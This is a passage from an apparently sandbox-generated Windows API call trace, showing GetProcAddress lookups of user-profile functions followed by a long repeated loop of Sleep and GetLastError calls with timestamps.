(hModule=0x7fefcf30000, lpProcName="DestroyEnvironmentBlock") returned 0x7fefcf31080 [0141.057] GetProcAddress (hModule=0x7fefcf30000, lpProcName="LoadUserProfileW") returned 0x7fefcf31170 [0141.057] GetProcAddress (hModule=0x7fefcf30000, lpProcName="UnloadUserProfile") returned 0x7fefcf33670 [0141.057] Sleep (dwMilliseconds=0x1) [0141.065] GetLastError () returned 0x0 [0141.066] Sleep (dwMilliseconds=0x1) [0141.082] GetLastError () returned 0x0 [0141.082] Sleep (dwMilliseconds=0x1) [0141.102] GetLastError () returned 0x0 [0141.102] Sleep (dwMilliseconds=0x1) [0141.119] GetLastError () returned 0x0 [0141.119] Sleep (dwMilliseconds=0x1) [0141.138] GetLastError () returned 0x0 [0141.138] Sleep (dwMilliseconds=0x1) [0141.149] GetLastError () returned 0x0 [0141.149] Sleep (dwMilliseconds=0x1) [0141.165] GetLastError () returned 0x0 [0141.165] Sleep (dwMilliseconds=0x1) [0141.175] GetLastError () returned 0x0 [0141.175] Sleep (dwMilliseconds=0x1) [0141.192] GetLastError () returned 0x0 [0141.192] Sleep (dwMilliseconds=0x1) [0141.217] GetLastError () returned 0x0 [0141.217] Sleep (dwMilliseconds=0x1) [0141.252] GetLastError () returned 0x0 [0141.252] Sleep (dwMilliseconds=0x1) [0141.268] GetLastError () returned 0x0 [0141.268] Sleep (dwMilliseconds=0x1) [0141.284] GetLastError () returned 0x0 [0141.284] Sleep (dwMilliseconds=0x1) [0141.299] GetLastError () returned 0x0 [0141.299] Sleep (dwMilliseconds=0x1) [0141.315] GetLastError () returned 0x0 [0141.315] Sleep (dwMilliseconds=0x1) [0141.330] GetLastError () returned 0x0 [0141.331] Sleep (dwMilliseconds=0x1) [0141.363] GetLastError () returned 0x0 [0141.363] Sleep (dwMilliseconds=0x1) [0141.377] GetLastError () returned 0x0 [0141.377] Sleep (dwMilliseconds=0x1) [0141.393] GetLastError () returned 0x0 [0141.393] Sleep (dwMilliseconds=0x1) [0141.409] GetLastError () returned 0x0 [0141.409] Sleep (dwMilliseconds=0x1) [0141.424] GetLastError () returned 0x0 [0141.424] Sleep (dwMilliseconds=0x1) [0141.440] GetLastError () returned 0x0 [0141.440] Sleep (dwMilliseconds=0x1) [0141.456] GetLastError () returned 0x0 [0141.456] Sleep (dwMilliseconds=0x1) [0141.498] GetLastError () returned 0x0 [0141.498] Sleep (dwMilliseconds=0x1) [0141.502] GetLastError () returned 0x0 [0141.502] Sleep (dwMilliseconds=0x1) [0141.530] GetLastError () returned 0x0 [0141.530] Sleep (dwMilliseconds=0x1) [0141.534] GetLastError () returned 0x0 [0141.534] Sleep (dwMilliseconds=0x1) [0141.550] GetLastError () returned 0x0 [0141.550] Sleep (dwMilliseconds=0x1) [0141.564] GetLastError () returned 0x0 [0141.565] Sleep (dwMilliseconds=0x1) [0141.580] GetLastError () returned 0x0 [0141.580] Sleep (dwMilliseconds=0x1) [0141.596] GetLastError () returned 0x0 [0141.596] Sleep (dwMilliseconds=0x1) [0141.612] GetLastError () returned 0x0 [0141.612] Sleep (dwMilliseconds=0x1) [0141.627] GetLastError () returned 0x0 [0141.627] Sleep (dwMilliseconds=0x1) [0141.752] GetLastError () returned 0x0 [0141.752] Sleep (dwMilliseconds=0x1) [0141.767] GetLastError () returned 0x0 [0141.767] Sleep (dwMilliseconds=0x1) [0141.814] GetLastError () returned 0x0 [0141.814] Sleep (dwMilliseconds=0x1) [0141.834] GetLastError () returned 0x0 [0141.834] Sleep (dwMilliseconds=0x1) [0141.845] GetLastError () returned 0x0 [0141.845] Sleep (dwMilliseconds=0x1) [0141.866] GetLastError () returned 0x0 [0141.866] Sleep (dwMilliseconds=0x1) [0141.890] GetLastError () returned 0x0 [0141.890] Sleep (dwMilliseconds=0x1) [0141.892] GetLastError () returned 0x0 [0141.892] Sleep (dwMilliseconds=0x1) [0141.908] GetLastError () returned 0x0 [0141.909] Sleep (dwMilliseconds=0x1) [0141.926] GetLastError () returned 0x0 [0141.926] Sleep (dwMilliseconds=0x1) [0141.940] GetLastError () returned 0x0 [0141.940] Sleep (dwMilliseconds=0x1) [0141.954] GetLastError () returned 0x0 [0141.955] Sleep (dwMilliseconds=0x1) [0141.977] GetLastError () returned 0x0 [0141.978] Sleep (dwMilliseconds=0x1) [0141.986] GetLastError () returned 0x0 [0141.986] Sleep (dwMilliseconds=0x1) [0142.001] GetLastError () returned 0x0 [0142.001] Sleep (dwMilliseconds=0x1) [0142.035] GetLastError () returned 0x0 [0142.035] Sleep (dwMilliseconds=0x1) [0142.081] GetLastError () returned 0x0 [0142.081] Sleep (dwMilliseconds=0x1) [0142.131] GetLastError () returned 0x0 [0142.131] Sleep (dwMilliseconds=0x1) [0142.248] GetLastError () returned 0x0 [0142.249] Sleep (dwMilliseconds=0x1) [0142.283] GetLastError () returned 0x0 [0142.283] Sleep (dwMilliseconds=0x1) [0142.330] GetLastError () returned 0x0 [0142.330] Sleep (dwMilliseconds=0x1) [0142.387] GetLastError () returned 0x0 [0142.387] Sleep (dwMilliseconds=0x1) [0142.428] GetLastError () returned 0x0 [0142.428] Sleep (dwMilliseconds=0x1) [0142.487] GetLastError () returned 0x0 [0142.487] Sleep (dwMilliseconds=0x1) [0142.551] GetLastError () returned 0x0 [0142.551] Sleep (dwMilliseconds=0x1) [0142.604] GetLastError () returned 0x0 [0142.604] Sleep (dwMilliseconds=0x1) [0142.644] GetLastError () returned 0x0 [0142.644] Sleep (dwMilliseconds=0x1) [0142.813] GetLastError () returned 0x0 [0142.813] Sleep (dwMilliseconds=0x1) [0142.872] GetLastError () returned 0x0 [0142.872] Sleep (dwMilliseconds=0x1) [0142.931] GetLastError () returned 0x0 [0142.931] Sleep (dwMilliseconds=0x1) [0142.977] GetLastError () returned 0x0 [0142.977] Sleep (dwMilliseconds=0x1) [0143.024] GetLastError () returned 0x0 [0143.024] Sleep (dwMilliseconds=0x1) [0143.062] GetLastError () returned 0x0 [0143.062] Sleep (dwMilliseconds=0x1) [0143.109] GetLastError () returned 0x0 [0143.109] Sleep (dwMilliseconds=0x1) [0143.172] GetLastError () returned 0x0 [0143.172] Sleep (dwMilliseconds=0x1) [0143.234] GetLastError () returned 0x0 [0143.234] Sleep (dwMilliseconds=0x1) [0143.285] GetLastError () returned 0x0 [0143.285] Sleep (dwMilliseconds=0x1) [0143.360] GetLastError () returned 0x0 [0143.360] Sleep (dwMilliseconds=0x1) [0143.439] GetLastError () returned 0x0 [0143.439] Sleep (dwMilliseconds=0x1) [0143.484] GetLastError () returned 0x0 [0143.484] Sleep (dwMilliseconds=0x1) [0143.530] GetLastError () returned 0x0 [0143.530] Sleep (dwMilliseconds=0x1) [0143.577] GetLastError () returned 0x0 [0143.577] Sleep (dwMilliseconds=0x1) [0143.624] GetLastError () returned 0x0 [0143.624] Sleep (dwMilliseconds=0x1) [0143.670] GetLastError () returned 0x0 [0143.670] Sleep (dwMilliseconds=0x1) [0143.796] GetLastError () returned 0x0 [0143.796] Sleep (dwMilliseconds=0x1) [0143.844] GetLastError () returned 0x0 [0143.844] Sleep (dwMilliseconds=0x1) [0143.890] GetLastError () returned 0x0 [0143.890] Sleep (dwMilliseconds=0x1) [0143.931] GetLastError () returned 0x0 [0143.931] Sleep (dwMilliseconds=0x1) [0143.946] GetLastError () returned 0x0 [0143.946] Sleep (dwMilliseconds=0x1) [0143.957] GetLastError () returned 0x0 [0143.957] Sleep (dwMilliseconds=0x1) [0143.980] GetLastError () returned 0x0 [0143.980] Sleep (dwMilliseconds=0x1) [0143.983] GetLastError () returned 0x0 [0143.983] Sleep (dwMilliseconds=0x1) [0143.999] GetLastError () returned 0x0 [0143.999] Sleep (dwMilliseconds=0x1) [0144.016] GetLastError () returned 0x0 [0144.016] Sleep (dwMilliseconds=0x1) [0144.033] GetLastError () returned 0x0 [0144.033] Sleep (dwMilliseconds=0x1) [0144.068] GetLastError () returned 0x0 [0144.068] Sleep (dwMilliseconds=0x1) [0144.076] GetLastError () returned 0x0 [0144.076] Sleep (dwMilliseconds=0x1) [0144.120] GetLastError () returned 0x0 [0144.120] Sleep (dwMilliseconds=0x1) [0144.161] GetLastError () returned 0x0 [0144.161] Sleep (dwMilliseconds=0x1) [0144.171] GetLastError () returned 0x0 [0144.172] Sleep (dwMilliseconds=0x1) [0144.201] GetLastError () returned 0x0 [0144.201] Sleep (dwMilliseconds=0x1) [0144.206] GetLastError () returned 0x0 [0144.206] Sleep (dwMilliseconds=0x1) [0144.264] GetLastError () returned 0x0 [0144.264] Sleep (dwMilliseconds=0x1) [0144.318] GetLastError () returned 0x0 [0144.318] Sleep (dwMilliseconds=0x1) [0144.329] GetLastError () returned 0x0 [0144.329] Sleep (dwMilliseconds=0x1) [0144.349] GetLastError () returned 0x0 [0144.349] Sleep (dwMilliseconds=0x1) [0144.363] GetLastError () returned 0x0 [0144.363] Sleep (dwMilliseconds=0x1) [0144.512] GetLastError () returned 0x0 [0144.512] Sleep (dwMilliseconds=0x1) [0144.549] GetLastError () returned 0x0 [0144.549] Sleep (dwMilliseconds=0x1) [0144.580] GetLastError () returned 0x0 [0144.580] Sleep (dwMilliseconds=0x1) [0144.599] GetLastError () returned 0x0 [0144.599] Sleep (dwMilliseconds=0x1) [0144.638] GetLastError () returned 0x0 [0144.638] Sleep (dwMilliseconds=0x1) [0144.717] GetLastError () returned 0x0 [0144.717] Sleep (dwMilliseconds=0x1) [0144.996] GetLastError () returned 0x0 [0144.996] Sleep (dwMilliseconds=0x1) [0145.055] GetLastError () returned 0x0 [0145.055] Sleep (dwMilliseconds=0x1) [0145.080] GetLastError () returned 0x0 [0145.080] Sleep (dwMilliseconds=0x1) [0145.094] GetLastError () returned 0x0 [0145.094] Sleep (dwMilliseconds=0x1) [0145.276] GetLastError () returned 0x0 [0145.276] Sleep (dwMilliseconds=0x1) [0145.283] GetLastError () returned 0x0 [0145.283] Sleep (dwMilliseconds=0x1) [0145.343] GetLastError () returned 0x0 [0145.343] Sleep (dwMilliseconds=0x1) [0145.392] GetLastError () returned 0x0 [0145.392] Sleep (dwMilliseconds=0x1) [0145.420] GetLastError () returned 0x0 [0145.420] Sleep (dwMilliseconds=0x1) [0145.437] GetLastError () returned 0x0 [0145.437] Sleep (dwMilliseconds=0x1) [0145.450] GetLastError () returned 0x0 [0145.450] Sleep (dwMilliseconds=0x1) [0145.483] GetLastError () returned 0x0 [0145.483] Sleep (dwMilliseconds=0x1) [0145.496] GetLastError () returned 0x0 [0145.496] Sleep (dwMilliseconds=0x1) [0145.511] GetLastError () returned 0x0 [0145.511] Sleep (dwMilliseconds=0x1) [0145.527] GetLastError () returned 0x0 [0145.527] Sleep (dwMilliseconds=0x1) [0145.589] GetLastError () returned 0x0 [0145.589] Sleep (dwMilliseconds=0x1) [0145.611] GetLastError () returned 0x0 [0145.611] Sleep (dwMilliseconds=0x1) [0145.668] GetLastError () returned 0x0 [0145.668] Sleep (dwMilliseconds=0x1) [0145.693] GetLastError () returned 0x0 [0145.693] Sleep (dwMilliseconds=0x1) [0145.710] GetLastError () returned 0x0 [0145.710] Sleep (dwMilliseconds=0x1) [0145.714] GetLastError () returned 0x0 [0145.714] Sleep (dwMilliseconds=0x1) [0145.730] GetLastError () returned 0x0 [0145.730] Sleep (dwMilliseconds=0x1) [0145.745] GetLastError () returned 0x0 [0145.745] Sleep (dwMilliseconds=0x1) [0145.761] GetLastError () returned 0x0 [0145.761] Sleep (dwMilliseconds=0x1) [0145.776] GetLastError () returned 0x0 [0145.776] Sleep (dwMilliseconds=0x1) [0145.812] GetLastError () returned 0x0 [0145.812] Sleep (dwMilliseconds=0x1) [0145.823] GetLastError () returned 0x0 [0145.823] Sleep (dwMilliseconds=0x1) [0145.839] GetLastError () returned 0x0 [0145.839] Sleep (dwMilliseconds=0x1) [0145.855] GetLastError () returned 0x0 [0145.855] Sleep (dwMilliseconds=0x1) [0145.870] GetLastError () returned 0x0 [0145.870] Sleep (dwMilliseconds=0x1) [0145.886] GetLastError () returned 0x0 [0145.886] Sleep (dwMilliseconds=0x1) [0145.916] GetLastError () returned 0x0 [0145.916] Sleep (dwMilliseconds=0x1) [0145.917] GetLastError () returned 0x0 [0145.917] Sleep (dwMilliseconds=0x1) [0146.033] GetLastError () returned 0x0 [0146.033] Sleep (dwMilliseconds=0x1) [0146.042] GetLastError () returned 0x0 [0146.042] Sleep (dwMilliseconds=0x1) [0146.058] GetLastError () returned 0x0 [0146.058] Sleep (dwMilliseconds=0x1) [0146.073] GetLastError () returned 0x0 [0146.073] Sleep (dwMilliseconds=0x1) [0146.089] GetLastError () returned 0x0 [0146.089] Sleep (dwMilliseconds=0x1) [0146.128] GetLastError () returned 0x0 [0146.128] Sleep (dwMilliseconds=0x1) [0146.135] GetLastError () returned 0x0 [0146.136] Sleep (dwMilliseconds=0x1) [0146.151] GetLastError () returned 0x0 [0146.151] Sleep (dwMilliseconds=0x1) [0146.167] GetLastError () returned 0x0 [0146.167] Sleep (dwMilliseconds=0x1) [0146.182] GetLastError () returned 0x0 [0146.182] Sleep (dwMilliseconds=0x1) [0146.198] GetLastError () returned 0x0 [0146.198] Sleep (dwMilliseconds=0x1) [0146.276] GetLastError () returned 0x0 [0146.276] Sleep (dwMilliseconds=0x1) [0146.310] GetLastError () returned 0x0 [0146.310] Sleep (dwMilliseconds=0x1) [0146.354] GetLastError () returned 0x0 [0146.354] Sleep (dwMilliseconds=0x1) [0146.443] GetLastError () returned 0x0 [0146.443] Sleep (dwMilliseconds=0x1) [0146.478] GetLastError () returned 0x0 [0146.479] Sleep (dwMilliseconds=0x1) [0146.526] GetLastError () returned 0x0 [0146.526] Sleep (dwMilliseconds=0x1) [0146.573] GetLastError () returned 0x0 [0146.573] Sleep (dwMilliseconds=0x1) [0146.604] GetLastError () returned 0x0 [0146.604] Sleep (dwMilliseconds=0x1) [0146.620] GetLastError () returned 0x0 [0146.620] Sleep (dwMilliseconds=0x1) [0146.636] GetLastError () returned 0x0 [0146.636] Sleep (dwMilliseconds=0x1) [0146.667] GetLastError () returned 0x0 [0146.667] Sleep (dwMilliseconds=0x1) [0146.711] GetLastError () returned 0x0 [0146.711] Sleep (dwMilliseconds=0x1) [0146.735] GetLastError () returned 0x0 [0146.735] Sleep (dwMilliseconds=0x1) [0146.751] GetLastError () returned 0x0 [0146.751] Sleep (dwMilliseconds=0x1) [0146.806] GetLastError () returned 0x0 [0146.806] Sleep (dwMilliseconds=0x1) [0146.857] GetLastError () returned 0x0 [0146.857] Sleep (dwMilliseconds=0x1) [0146.909] GetLastError () returned 0x0 [0146.909] Sleep (dwMilliseconds=0x1) [0147.032] GetLastError () returned 0x0 [0147.032] Sleep (dwMilliseconds=0x1) [0147.049] GetLastError () returned 0x0 [0147.049] Sleep (dwMilliseconds=0x1) [0147.078] GetLastError () returned 0x0 [0147.078] Sleep (dwMilliseconds=0x1) [0147.107] GetLastError () returned 0x0 [0147.107] Sleep (dwMilliseconds=0x1) [0147.119] GetLastError () returned 0x0 [0147.119] Sleep (dwMilliseconds=0x1) [0147.135] GetLastError () returned 0x0 [0147.135] Sleep (dwMilliseconds=0x1) [0147.149] GetLastError () returned 0x0 [0147.149] Sleep (dwMilliseconds=0x1) [0147.165] GetLastError () returned 0x0 [0147.165] Sleep (dwMilliseconds=0x1) [0148.139] GetLastError () returned 0x0 [0148.139] Sleep (dwMilliseconds=0x1) [0148.179] GetLastError () returned 0x0 [0148.179] Sleep (dwMilliseconds=0x1) [0148.219] GetLastError () returned 0x0 [0148.219] Sleep (dwMilliseconds=0x1) [0148.226] GetLastError () returned 0x0 [0148.226] Sleep (dwMilliseconds=0x1) [0149.191] GetLastError () returned 0x0 [0149.191] Sleep (dwMilliseconds=0x1) [0149.194] GetLastError () returned 0x0 [0149.194] Sleep (dwMilliseconds=0x1) [0149.211] GetLastError () returned 0x0 [0149.211] Sleep (dwMilliseconds=0x1) [0149.225] GetLastError () returned 0x0 [0149.226] Sleep (dwMilliseconds=0x1) [0149.240] GetLastError () returned 0x0 [0149.240] Sleep (dwMilliseconds=0x1) [0149.265] GetLastError () returned 0x0 [0149.265] Sleep (dwMilliseconds=0x1) [0149.271] GetLastError () returned 0x0 [0149.271] Sleep (dwMilliseconds=0x1) [0149.286] GetLastError () returned 0x0 [0149.286] Sleep (dwMilliseconds=0x1) [0149.334] GetLastError () returned 0x0 [0149.334] Sleep (dwMilliseconds=0x1) [0149.392] GetLastError () returned 0x0 [0149.392] Sleep (dwMilliseconds=0x1) [0149.417] GetLastError () returned 0x0 [0149.417] Sleep (dwMilliseconds=0x1) [0149.427] GetLastError () returned 0x0 [0149.427] Sleep (dwMilliseconds=0x1) [0149.442] GetLastError () returned 0x0 [0149.443] Sleep (dwMilliseconds=0x1) [0149.458] GetLastError () returned 0x0 [0149.458] Sleep (dwMilliseconds=0x1) [0149.484] GetLastError () returned 0x0 [0149.484] Sleep (dwMilliseconds=0x1) [0149.505] GetLastError () returned 0x0 [0149.505] Sleep (dwMilliseconds=0x1) [0149.552] GetLastError () returned 0x0 [0149.552] Sleep (dwMilliseconds=0x1) [0149.601] GetLastError () returned 0x0 [0149.601] Sleep (dwMilliseconds=0x1) [0149.620] GetLastError () returned 0x0 [0149.620] Sleep (dwMilliseconds=0x1) [0149.636] GetLastError () returned 0x0 [0149.636] Sleep (dwMilliseconds=0x1) [0149.655] GetLastError () returned 0x0 [0149.655] Sleep (dwMilliseconds=0x1) [0149.676] GetLastError () returned 0x0 [0149.676] Sleep (dwMilliseconds=0x1) [0149.676] GetLastError () returned 0x0 [0149.676] Sleep (dwMilliseconds=0x1) [0149.706] GetLastError () returned 0x0 [0149.706] Sleep (dwMilliseconds=0x1) [0149.740] GetLastError () returned 0x0 [0149.740] Sleep (dwMilliseconds=0x1) [0149.760] GetLastError () returned 0x0 [0149.760] Sleep (dwMilliseconds=0x1) [0149.771] GetLastError () returned 0x0 [0149.771] Sleep (dwMilliseconds=0x1) [0149.787] GetLastError () returned 0x0 [0149.787] Sleep (dwMilliseconds=0x1) [0149.931] GetLastError () returned 0x0 [0149.931] Sleep (dwMilliseconds=0x1) [0149.950] GetLastError () returned 0x0 [0149.950] Sleep (dwMilliseconds=0x1) [0149.958] GetLastError () returned 0x0 [0149.958] Sleep (dwMilliseconds=0x1) [0149.978] GetLastError () returned 0x0 [0149.978] Sleep (dwMilliseconds=0x1) [0149.991] GetLastError () returned 0x0 [0149.991] Sleep (dwMilliseconds=0x1) [0150.005] GetLastError () returned 0x0 [0150.005] Sleep (dwMilliseconds=0x1) [0150.066] GetLastError () returned 0x0 [0150.066] Sleep (dwMilliseconds=0x1) [0150.128] GetLastError () returned 0x0 [0150.128] Sleep (dwMilliseconds=0x1) [0150.146] GetLastError () returned 0x0 [0150.146] Sleep (dwMilliseconds=0x1) [0150.165] GetLastError () returned 0x0 [0150.165] Sleep (dwMilliseconds=0x1) [0150.204] GetLastError () returned 0x0 [0150.204] Sleep (dwMilliseconds=0x1) [0150.209] GetLastError () returned 0x0 [0150.209] Sleep (dwMilliseconds=0x1) [0150.224] GetLastError () returned 0x0 [0150.224] Sleep (dwMilliseconds=0x1) [0150.246] GetLastError () returned 0x0 [0150.246] Sleep (dwMilliseconds=0x1) [0150.276] GetLastError () returned 0x0 [0150.276] Sleep (dwMilliseconds=0x1) [0150.293] GetLastError () returned 0x0 [0150.293] Sleep (dwMilliseconds=0x1) [0150.301] GetLastError () returned 0x0 [0150.301] Sleep (dwMilliseconds=0x1) [0150.317] GetLastError () returned 0x0 [0150.317] Sleep (dwMilliseconds=0x1) [0150.352] GetLastError () returned 0x0 [0150.352] Sleep (dwMilliseconds=0x1) [0150.363] GetLastError () returned 0x0 [0150.363] Sleep (dwMilliseconds=0x1) [0150.378] GetLastError () returned 0x0 [0150.378] Sleep (dwMilliseconds=0x1) [0150.395] GetLastError () returned 0x0 [0150.395] Sleep (dwMilliseconds=0x1) [0150.434] GetLastError () returned 0x0 [0150.434] Sleep (dwMilliseconds=0x1) [0150.457] GetLastError () returned 0x0 [0150.457] Sleep (dwMilliseconds=0x1) [0150.472] GetLastError () returned 0x0 [0150.472] Sleep (dwMilliseconds=0x1) [0150.500] GetLastError () returned 0x0 [0150.500] Sleep (dwMilliseconds=0x1) [0150.511] GetLastError () returned 0x0 [0150.511] Sleep (dwMilliseconds=0x1) [0150.519] GetLastError () returned 0x0 [0150.519] Sleep (dwMilliseconds=0x1) [0150.552] GetLastError () returned 0x0 [0150.552] Sleep (dwMilliseconds=0x1) [0150.576] GetLastError () returned 0x0 [0150.576] Sleep (dwMilliseconds=0x1) [0150.600] GetLastError () returned 0x0 [0150.600] Sleep (dwMilliseconds=0x1) [0150.624] GetLastError () returned 0x0 [0150.624] Sleep (dwMilliseconds=0x1) [0150.643] GetLastError () returned 0x0 [0150.643] Sleep (dwMilliseconds=0x1) [0150.650] GetLastError () returned 0x0 [0150.650] Sleep (dwMilliseconds=0x1) [0150.660] GetLastError () returned 0x0 [0150.660] Sleep (dwMilliseconds=0x1) [0150.675] GetLastError () returned 0x0 [0150.675] Sleep (dwMilliseconds=0x1) [0150.691] GetLastError () returned 0x0 [0150.691] Sleep (dwMilliseconds=0x1) [0150.710] GetLastError () returned 0x0 [0150.710] Sleep (dwMilliseconds=0x1) [0150.729] GetLastError () returned 0x0 [0150.729] Sleep (dwMilliseconds=0x1) [0150.754] GetLastError () returned 0x0 [0150.754] Sleep (dwMilliseconds=0x1) [0150.768] GetLastError () returned 0x0 [0150.769] Sleep (dwMilliseconds=0x1) [0150.784] GetLastError () returned 0x0 [0150.784] Sleep (dwMilliseconds=0x1) [0150.896] GetLastError () returned 0x0 [0150.896] Sleep (dwMilliseconds=0x1) [0150.910] GetLastError () returned 0x0 [0150.910] Sleep (dwMilliseconds=0x1) [0150.926] GetLastError () returned 0x0 [0150.926] Sleep (dwMilliseconds=0x1) [0150.943] GetLastError () returned 0x0 [0150.943] Sleep (dwMilliseconds=0x1) [0150.956] GetLastError () returned 0x0 [0150.956] Sleep (dwMilliseconds=0x1) [0150.971] GetLastError () returned 0x0 [0150.971] Sleep (dwMilliseconds=0x1) [0150.987] GetLastError () returned 0x0 [0150.987] Sleep (dwMilliseconds=0x1) [0151.004] GetLastError () returned 0x0 [0151.004] Sleep (dwMilliseconds=0x1) [0151.065] GetLastError () returned 0x0 [0151.065] Sleep (dwMilliseconds=0x1) [0151.143] GetLastError () returned 0x0 [0151.143] Sleep (dwMilliseconds=0x1) [0151.160] GetLastError () returned 0x0 [0151.160] Sleep (dwMilliseconds=0x1) [0151.175] GetLastError () returned 0x0 [0151.175] Sleep (dwMilliseconds=0x1) [0151.197] GetLastError () returned 0x0 [0151.197] Sleep (dwMilliseconds=0x1) [0151.211] GetLastError () returned 0x0 [0151.212] Sleep (dwMilliseconds=0x1) [0151.221] GetLastError () returned 0x0 [0151.221] Sleep (dwMilliseconds=0x1) [0151.236] GetLastError () returned 0x0 [0151.236] Sleep (dwMilliseconds=0x1) [0151.252] GetLastError () returned 0x0 [0151.252] Sleep (dwMilliseconds=0x1) [0151.268] GetLastError () returned 0x0 [0151.268] Sleep (dwMilliseconds=0x1) [0151.290] GetLastError () returned 0x0 [0151.290] Sleep (dwMilliseconds=0x1) [0151.349] GetLastError () returned 0x0 [0151.349] Sleep (dwMilliseconds=0x1) [0151.377] GetLastError () returned 0x0 [0151.377] Sleep (dwMilliseconds=0x1) [0151.394] GetLastError () returned 0x0 [0151.394] Sleep (dwMilliseconds=0x1) [0151.408] GetLastError () returned 0x0 [0151.408] Sleep (dwMilliseconds=0x1) [0151.424] GetLastError () returned 0x0 [0151.424] Sleep (dwMilliseconds=0x1) [0151.439] GetLastError () returned 0x0 [0151.439] Sleep (dwMilliseconds=0x1) [0151.456] GetLastError () returned 0x0 [0151.456] Sleep (dwMilliseconds=0x1) [0151.503] GetLastError () returned 0x0 [0151.503] Sleep (dwMilliseconds=0x1) [0151.595] GetLastError () returned 0x0 [0151.595] Sleep (dwMilliseconds=0x1) [0151.671] GetLastError () returned 0x0 [0151.671] Sleep (dwMilliseconds=0x1) [0151.691] GetLastError () returned 0x0 [0151.691] Sleep (dwMilliseconds=0x1) [0151.752] GetLastError () returned 0x0 [0151.752] Sleep (dwMilliseconds=0x1) [0151.877] GetLastError () returned 0x0 [0151.877] Sleep (dwMilliseconds=0x1) [0151.933] GetLastError () returned 0x0 [0151.933] Sleep (dwMilliseconds=0x1) [0152.003] GetLastError () returned 0x0 [0152.003] Sleep (dwMilliseconds=0x1) [0152.079] GetLastError () returned 0x0 [0152.079] Sleep (dwMilliseconds=0x1) [0152.163] GetLastError () returned 0x0 [0152.163] Sleep (dwMilliseconds=0x1) [0152.250] GetLastError () returned 0x0 [0152.250] Sleep (dwMilliseconds=0x1) [0152.328] GetLastError () returned 0x0 [0152.328] Sleep (dwMilliseconds=0x1) [0152.345] GetLastError () returned 0x0 [0152.345] Sleep (dwMilliseconds=0x1) [0152.417] GetLastError () returned 0x0 [0152.417] Sleep (dwMilliseconds=0x1) [0152.485] GetLastError () returned 0x0 [0152.485] Sleep (dwMilliseconds=0x1) [0152.514] GetLastError () returned 0x0 [0152.514] Sleep (dwMilliseconds=0x1) [0152.519] GetLastError () returned 0x0 [0152.519] Sleep (dwMilliseconds=0x1) [0152.578] GetLastError () returned 0x0 [0152.578] Sleep (dwMilliseconds=0x1) [0152.641] GetLastError () returned 0x0 [0152.641] Sleep (dwMilliseconds=0x1) [0152.656] GetLastError () returned 0x0 [0152.656] Sleep (dwMilliseconds=0x1) [0152.672] GetLastError () returned 0x0 [0152.672] Sleep (dwMilliseconds=0x1) [0152.687] GetLastError () returned 0x0 [0152.687] Sleep (dwMilliseconds=0x1) [0152.704] GetLastError () returned 0x0 [0152.704] Sleep (dwMilliseconds=0x1) [0152.718] GetLastError () returned 0x0 [0152.719] Sleep (dwMilliseconds=0x1) [0152.734] GetLastError () returned 0x0 [0152.734] Sleep (dwMilliseconds=0x1) [0152.750] GetLastError () returned 0x0 [0152.750] Sleep (dwMilliseconds=0x1) [0152.765] GetLastError () returned 0x0 [0152.765] Sleep (dwMilliseconds=0x1) [0152.781] GetLastError () returned 0x0 [0152.781] Sleep (dwMilliseconds=0x1) [0152.797] GetLastError () returned 0x0 [0152.797] Sleep (dwMilliseconds=0x1) [0152.884] GetLastError () returned 0x0 [0152.884] Sleep (dwMilliseconds=0x1) [0152.890] GetLastError () returned 0x0 [0152.890] Sleep (dwMilliseconds=0x1) [0152.906] GetLastError () returned 0x0 [0152.906] Sleep (dwMilliseconds=0x1) [0152.922] GetLastError () returned 0x0 [0152.922] Sleep (dwMilliseconds=0x1) [0152.937] GetLastError () returned 0x0 [0152.937] Sleep (dwMilliseconds=0x1) [0152.953] GetLastError () returned 0x0 [0152.953] Sleep (dwMilliseconds=0x1) [0152.968] GetLastError () returned 0x0 [0152.968] Sleep (dwMilliseconds=0x1) [0152.984] GetLastError () returned 0x0 [0152.984] Sleep (dwMilliseconds=0x1) [0152.999] GetLastError () returned 0x0 [0152.999] Sleep (dwMilliseconds=0x1) [0153.015] GetLastError () returned 0x0 [0153.015] Sleep (dwMilliseconds=0x1) [0153.031] GetLastError () returned 0x0 [0153.031] Sleep (dwMilliseconds=0x1) [0153.061] GetLastError () returned 0x0 [0153.061] Sleep (dwMilliseconds=0x1) [0153.109] GetLastError () returned 0x0 [0153.109] Sleep (dwMilliseconds=0x1) [0153.124] GetLastError () returned 0x0 [0153.124] Sleep (dwMilliseconds=0x1) [0153.140] GetLastError () returned 0x0 [0153.140] Sleep (dwMilliseconds=0x1) [0153.155] GetLastError () returned 0x0 [0153.155] Sleep (dwMilliseconds=0x1) [0153.178] GetLastError () returned 0x0 [0153.178] Sleep (dwMilliseconds=0x1) [0153.187] GetLastError () returned 0x0 [0153.187] Sleep (dwMilliseconds=0x1) [0153.223] GetLastError () returned 0x0 [0153.223] Sleep (dwMilliseconds=0x1) [0153.239] GetLastError () returned 0x0 [0153.239] Sleep (dwMilliseconds=0x1) [0153.249] GetLastError () returned 0x0 [0153.249] Sleep (dwMilliseconds=0x1) [0153.296] GetLastError () returned 0x0 [0153.296] Sleep (dwMilliseconds=0x1) [0153.335] GetLastError () returned 0x0 [0153.335] Sleep (dwMilliseconds=0x1) [0153.410] GetLastError () returned 0x0 [0153.410] Sleep (dwMilliseconds=0x1) [0153.421] GetLastError () returned 0x0 [0153.421] Sleep (dwMilliseconds=0x1) [0153.449] GetLastError () returned 0x0 [0153.449] Sleep (dwMilliseconds=0x1) [0153.454] GetLastError () returned 0x0 [0153.454] Sleep (dwMilliseconds=0x1) [0153.508] GetLastError () returned 0x0 [0153.508] Sleep (dwMilliseconds=0x1) [0153.529] GetLastError () returned 0x0 [0153.530] Sleep (dwMilliseconds=0x1) [0153.561] GetLastError () returned 0x0 [0153.561] Sleep (dwMilliseconds=0x1) [0153.603] GetLastError () returned 0x0 [0153.603] Sleep (dwMilliseconds=0x1) [0153.619] GetLastError () returned 0x0 [0153.619] Sleep (dwMilliseconds=0x1) [0153.639] GetLastError () returned 0x0 [0153.639] Sleep (dwMilliseconds=0x1) [0153.718] GetLastError () returned 0x0 [0153.718] Sleep (dwMilliseconds=0x1) [0153.773] GetLastError () returned 0x0 [0153.773] Sleep (dwMilliseconds=0x1) [0153.795] GetLastError () returned 0x0 [0153.795] Sleep (dwMilliseconds=0x1) [0153.901] GetLastError () returned 0x0 [0153.901] Sleep (dwMilliseconds=0x1) [0153.923] GetLastError () returned 0x0 [0153.923] Sleep (dwMilliseconds=0x1) [0153.967] GetLastError () returned 0x0 [0153.967] Sleep (dwMilliseconds=0x1) [0154.064] GetLastError () returned 0x0 [0154.064] Sleep (dwMilliseconds=0x1) [0154.138] GetLastError () returned 0x0 